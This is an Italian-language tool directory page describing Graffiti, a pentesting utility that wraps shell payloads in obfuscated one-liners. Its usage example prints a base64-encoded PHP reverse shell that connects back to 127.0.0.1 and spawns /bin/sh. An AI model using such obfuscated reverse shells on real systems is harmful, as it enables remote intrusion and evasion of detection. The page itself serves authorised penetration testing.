Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Graffiti — Uno strumento per generare one-liner offuscati per assistere nei test di penetrazione | Kitploit
Strumenti/GitHubGitHub/ekultek/graffiti
Generazione di PayloadShellcodePenetration TestingSviluppo Payload
GitHubekultek/graffiti

Graffiti

Uno strumento per generare one-liner offuscati per assistere nei test di penetrazione

Vedi Repository
1804437 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

graffitibanner

NOTA: Non caricare mai i payload su checker online

Graffiti è uno strumento per generare oneliner offuscati per assistere in situazioni di penetration testing. Graffiti accetta i seguenti linguaggi per la codifica:

  • Python
  • Perl
  • Batch
  • Powershell
  • PHP
  • Bash

Graffiti accetta anche un linguaggio non attualmente presente nell'elenco e salva l'oneliner in un database.

Caratteristiche

Graffiti include un database completo che inserisce ogni payload codificato al suo interno, consentendo agli utenti di visualizzare i payload già creati per uso futuro. I payload possono essere codificati utilizzando le seguenti tecniche:

  • Xor
  • Base64
  • Hex
  • ROT13
  • Raw

Alcune caratteristiche di Graffiti includono:

  • Accesso diretto al terminale, con la possibilità di eseguire comandi esterni
  • Possibilità di creare i propri file JSON di payload
  • Possibilità di visualizzare i payload memorizzati nella cache all'interno del database
  • Possibilità di eseguire il database in memoria per una rapida cancellazione
  • Cronologia del terminale e salvataggio della cronologia
  • Completamento automatico tramite tab all'interno del terminale
  • Possibilità di cancellare in modo sicuro i file di cronologia e il file del database
  • Molteplici tecniche di codifica come sopra menzionato
  • Utilizzo

    Graffiti include un terminale integrato; quando non si passano flag al programma, si accede al terminale. Il terminale ha una cronologia, la possibilità di eseguire comandi esterni e i propri comandi interni. Per ottenere aiuto, basta digitare help o ?:

    root@kitploit:~
    
      ________              _____  _____.__  __  .__ 
     /  _____/___________ _/ ____\/ ____\__|/  |_|__|
    /   \  __\_  __ \__  \\   __\\   __\|  \   __\  |
    \    \_\  \  | \// __ \|  |   |  |  |  ||  | |  |
     \______  /__|  (____  /__|   |__|  |__||__| |__|
            \/           \/           
     v(0.1)               
    
    nessun argomento passato, accesso al terminale, digita `help/?` per assistenza, tutti i comandi che si trovano all'interno di `/bin` sono disponibili nel terminale
    root@graffiti:~/graffiti# ?
    
     Comando                                  Descrizione
    ---------                                --------------
     help/?                                  Mostra questo aiuto
     external                                Elenca i comandi esterni disponibili
     cached                                  Mostra tutti i payload già presenti nel database
     list/show                               Elenca tutti i payload disponibili
     search <frase>                          Cerca un payload specifico
     use <payload> <codificatore>            Utilizza questo payload e codificalo con un codificatore specifico
     info <payload>                          Ottieni informazioni su un payload specifico
     check                                   Controlla aggiornamenti
     history                                 Mostra la cronologia dei comandi
     exit/quit                               Esci dal terminale e dalla sessione in esecuzione
     encode <tipo-script> <codificatore>     Codifica un payload fornito
    
    root@graffiti:~/graffiti# help
    
     Comando                                  Descrizione
    ---------                                --------------
     help/?                                  Mostra questo aiuto
     external                                Elenca i comandi esterni disponibili
     cached                                  Mostra tutti i payload già presenti nel database
     list/show                               Elenca tutti i payload disponibili
     search <frase>                          Cerca un payload specifico
     use <payload> <codificatore>            Utilizza questo payload e codificalo con un codificatore specifico
     info <payload>                          Ottieni informazioni su un payload specifico
     check                                   Controlla aggiornamenti
     history                                 Mostra la cronologia dei comandi
     exit/quit                               Esci dal terminale e dalla sessione in esecuzione
     encode <tipo-script> <codificatore>     Codifica un payload fornito
    

    Graffiti include anche argomenti da riga di comando per quando hai bisogno di un payload codificato rapidamente:

    root@kitploit:~
    usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
                       [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
                       [-l]
                       [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
                       [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
                       [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]
    
    argomenti opzionali:
      -h, --help            mostra questo messaggio di aiuto ed esce
      -c CODEC, --codec CODEC
                            specifica una tecnica di codifica (*default=None)
      -p PAYLOAD, --payload PAYLOAD
                            passa il percorso di un payload da utilizzare (*default=None)
      --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                            crea un file payload e lo salva in ./etc/payloads (*default=None)
      -l, --list            elenca tutti i payload disponibili per percorso (*default=False)
      -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                            passa il tuo payload personale da utilizzare per la codifica (*default=None)
      -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                            passa un indirizzo di ascolto da utilizzare per il payload (se necessario) (*default=None)
      -lP LISTENING-PORT, --lport LISTENING-PORT
                            passa una porta di ascolto da utilizzare per il payload (se necessario) (*default=None)
      -u URL, --url URL     passa un URL se richiesto dal tuo payload (*default=None)
      -vC, --view-cached    visualizza i dati in cache già presenti nel database
      -H, --no-history      non salvare la cronologia dei comandi (*default=True)
      -W, --wipe            cancella il database e la cronologia (*default=False)
      --memory              inizializza il database in memoria invece di un file .db (*default=False)
      -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                            passa più comandi esterni, consentendo loro di essere accessibili all'interno del terminale; i comandi devono essere nel tuo PATH (*default=None)
    

    Codificare un payload è semplice come questo:

    root@kitploit:~
    root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
    Payload codificato:
    --------------------------------------------------
    
    php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'
    
    --------------------------------------------------
    

    Una demo di Graffiti è disponibile qui:

    to_video

    Installazione

    Su qualsiasi sistema Linux, Mac o Windows, Graffiti dovrebbe funzionare senza la necessità di installare pacchetti esterni. Se desideri installare Graffiti come eseguibile sul tuo sistema (devi essere su Linux o Mac per un funzionamento corretto), devi solo fare quanto segue:

    root@kitploit:~
    ./install.sh
    

    Questo installerà Graffiti nel tuo sistema e ti permetterà di eseguirlo da qualsiasi posizione.

    Bug e problemi

    Se dovessi trovare un bug o un problema, per favore crea una segnalazione con i dettagli qui e grazie in anticipo!

    Scarica lo strumento